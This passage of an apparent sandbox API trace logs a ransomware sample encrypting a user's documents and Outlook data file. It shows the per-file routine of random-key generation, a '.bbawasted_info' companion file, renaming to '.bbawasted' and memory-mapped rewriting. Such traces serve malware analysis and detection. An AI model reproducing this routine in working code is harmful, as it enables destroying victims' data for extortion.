(HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5d0700 [0071.741] lstrcpyW (in: lpString1=0x5d0772, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.741] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0071.741] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0071.741] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0071.741] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jOMFtqWc.pptx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jomftqwc.pptx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.743] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0071.744] SetEndOfFile (hFile=0xf8) returned 1 [0071.744] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.744] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.744] lstrcpyW (in: lpString1=0x5d0772, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.744] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jOMFtqWc.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jomftqwc.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jOMFtqWc.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jomftqwc.pptx.bbawasted")) returned 1 [0071.745] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jOMFtqWc.pptx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jomftqwc.pptx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0071.745] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0071.748] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0071.749] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.749] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.749] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0071.750] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0071.750] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.759] SetEndOfFile (hFile=0xf8) returned 1 [0071.761] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.761] CloseHandle (hObject=0xf8) returned 1 [0071.762] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0071.763] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0071.763] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0071.763] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.763] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JZTwfvNJ4.doc") returned 57 [0071.763] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5d0700 [0071.764] lstrcpyW (in: lpString1=0x5d0772, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.764] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0071.764] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0071.764] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0071.765] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JZTwfvNJ4.doc.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jztwfvnj4.doc.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.766] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0071.767] SetEndOfFile (hFile=0xf8) returned 1 [0071.767] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.767] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.767] lstrcpyW (in: lpString1=0x5d0772, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.767] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JZTwfvNJ4.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jztwfvnj4.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JZTwfvNJ4.doc.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jztwfvnj4.doc.bbawasted")) returned 1 [0071.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JZTwfvNJ4.doc.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jztwfvnj4.doc.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.768] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0071.768] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0071.769] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.769] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.769] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0071.770] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0071.770] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.817] SetEndOfFile (hFile=0xf8) returned 1 [0071.819] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.819] CloseHandle (hObject=0xf8) returned 1 [0071.820] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0071.821] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0071.821] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0071.821] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.821] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nepcSl5.docx") returned 56 [0071.821] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27a) returned 0x5d0700 [0071.821] lstrcpyW (in: lpString1=0x5d0770, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.821] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0071.822] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0071.822] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0071.822] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nepcSl5.docx.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nepcsl5.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.823] WriteFile (in: hFile=0xf8, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0071.824] SetEndOfFile (hFile=0xf8) returned 1 [0071.824] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.824] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.824] lstrcpyW (in: lpString1=0x5d0770, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nepcSl5.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nepcsl5.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nepcSl5.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nepcsl5.docx.bbawasted")) returned 1 [0071.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nepcSl5.docx.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nepcsl5.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0071.825] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0071.827] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0071.828] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0071.828] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.828] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0071.829] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0071.829] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.837] SetEndOfFile (hFile=0xf8) returned 1 [0071.839] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.839] CloseHandle (hObject=0xf8) returned 1 [0071.841] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0071.841] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0071.842] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0071.842] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.842] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 80 [0071.842] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2aa) returned 0x5bf070 [0071.842] lstrcpyW (in: lpString1=0x5bf110, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0071.842] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0071.842] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0071.843] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0071.843] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0071.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0071.863] WriteFile (in: hFile=0x110, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0071.864] SetEndOfFile (hFile=0x110) returned 1 [0071.864] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.864] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0071.864] lstrcpyW (in: lpString1=0x5bf110, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0071.864] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.bbawasted")) returned 1 [0071.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.865] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0072.179] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0072.179] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.179] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.179] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0072.180] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0072.180] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.188] SetEndOfFile (hFile=0x110) returned 1 [0072.190] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.191] CloseHandle (hObject=0x110) returned 1 [0072.192] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0072.192] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0072.193] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0072.193] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.193] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VS-LAZq2jIM7qArwxP1.ots") returned 67 [0072.193] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x290) returned 0x5c77b0 [0072.193] lstrcpyW (in: lpString1=0x5c7836, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.193] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0072.193] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0072.194] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0072.194] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.194] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VS-LAZq2jIM7qArwxP1.ots.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vs-lazq2jim7qarwxp1.ots.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.195] WriteFile (in: hFile=0x110, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0072.196] SetEndOfFile (hFile=0x110) returned 1 [0072.196] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.196] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.196] lstrcpyW (in: lpString1=0x5c7836, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.196] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VS-LAZq2jIM7qArwxP1.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vs-lazq2jim7qarwxp1.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VS-LAZq2jIM7qArwxP1.ots.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vs-lazq2jim7qarwxp1.ots.bbawasted")) returned 1 [0072.197] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\VS-LAZq2jIM7qArwxP1.ots.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vs-lazq2jim7qarwxp1.ots.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.197] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0072.199] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0072.200] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0072.200] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.200] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0072.201] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0072.201] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.209] SetEndOfFile (hFile=0x110) returned 1 [0072.211] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.211] CloseHandle (hObject=0x110) returned 1 [0072.212] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c77b0 | out: hHeap=0x580000) returned 1 [0072.212] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0072.213] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0072.213] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.213] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xnovZfQDj150gSejWU.ods") returned 66 [0072.213] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28e) returned 0x5c77b0 [0072.213] lstrcpyW (in: lpString1=0x5c7834, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0072.213] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c9c38 [0072.213] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0072.214] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c9c38 | out: pbBuffer=0x5c9c38) returned 1 [0072.214] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0072.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xnovZfQDj150gSejWU.ods.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xnovzfqdj150gsejwu.ods.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0072.260] WriteFile (in: hFile=0x110, lpBuffer=0x5c9c38*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c9c38*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0072.261] SetEndOfFile (hFile=0x110) returned 1 [0072.308] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.309] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c9c38 | out: hHeap=0x580000) returned 1 [0072.309] lstrcpyW (in: lpString1=0x5c7834, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0072.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xnovZfQDj150gSejWU.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xnovzfqdj150gsejwu.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xnovZfQDj150gSejWU.ods.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xnovzfqdj150gsejwu.ods.bbawasted")) returned 1 [0072.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xnovZfQDj150gSejWU.ods.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xnovzfqdj150gsejwu.ods.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0072.309] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0072.311] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5d0908) returned 1 [0072.312] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0072.312] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0072.312] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5d0908) returned 1 [0072.313] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0072.313] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0072.321] SetEndOfFile (hFile=0x110) returned 1 [0072.323] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0072.323] CloseHandle (hObject=0x110) returned 1 [0072.337] HeapFree (in: hHeap=0x580000, dwFlags=0x0, 